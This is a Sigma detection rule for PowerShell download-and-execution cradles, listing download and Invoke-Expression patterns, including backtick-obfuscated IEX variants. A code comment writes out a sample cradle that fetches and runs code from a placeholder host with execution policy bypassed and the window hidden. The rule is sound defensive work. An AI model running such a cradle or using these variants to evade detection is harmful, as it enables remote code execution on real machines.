PowerShell Download and Execution Cradles

 1title: PowerShell Download and Execution Cradles
 2id: 85b0b087-eddf-4a2b-b033-d771fa2b9775
 3status: test
 4description: Detects PowerShell download and execution cradles.
 5references:
 6    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
 7    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
 8author: Florian Roth (Nextron Systems)
 9date: 2022-03-24
10modified: 2025-07-18
11tags:
12    - attack.execution
13    - attack.t1059
14logsource:
15    product: windows
16    category: process_creation
17detection:
18    selection_download:
19        CommandLine|contains:
20            - '.DownloadString('
21            - '.DownloadFile('
22            - 'Invoke-WebRequest '
23            - 'iwr '
24            - 'Invoke-RestMethod '
25            - 'irm ' #powershell -ep bypass -w h -c irm test.domain/ffe | iex
26    selection_iex:
27        CommandLine|contains:
28            - ';iex $'
29            - '| IEX'
30            - '|IEX '
31            - 'I`E`X'
32            - 'I`EX'
33            - 'IE`X'
34            - 'iex '
35            - 'IEX ('
36            - 'IEX('
37            - 'Invoke-Expression'
38    condition: all of selection_*
39falsepositives:
40    - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
41level: high

References

• Payload-Download-Cradles/Download-Cradles.cmd at 88e8eca34464a547c90d9140d70e9866dcbc6a12 · VirtualAlllocEx/Payload-Download-Cradles

  

  This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections. - VirtualAlllocEx/...

  
  Read More

• FIN7 tradecraft seen in attacks against Veeam backup servers

  

  WithSecure Intelligence identified attacks which occurred in late March 2023 against internet-facing servers running Veeam Backup & Replication software. Our research indicates that the intrusion set used in these attacks has overlaps with those attributed to the FIN7 activity group. It is likely that initial access & execution was achieved through a recently patched Veeam Backup & Replication vulnerability, CVE-2023-27532.

  
  Read More

Related rules

• Capsh Shell Invocation - Linux
• Inline Python Execution - Spawn Shell Via OS System Library
• Shell Execution via Git - Linux
• Shell Invocation Via Ssh - Linux
• Shell Invocation via Env Command - Linux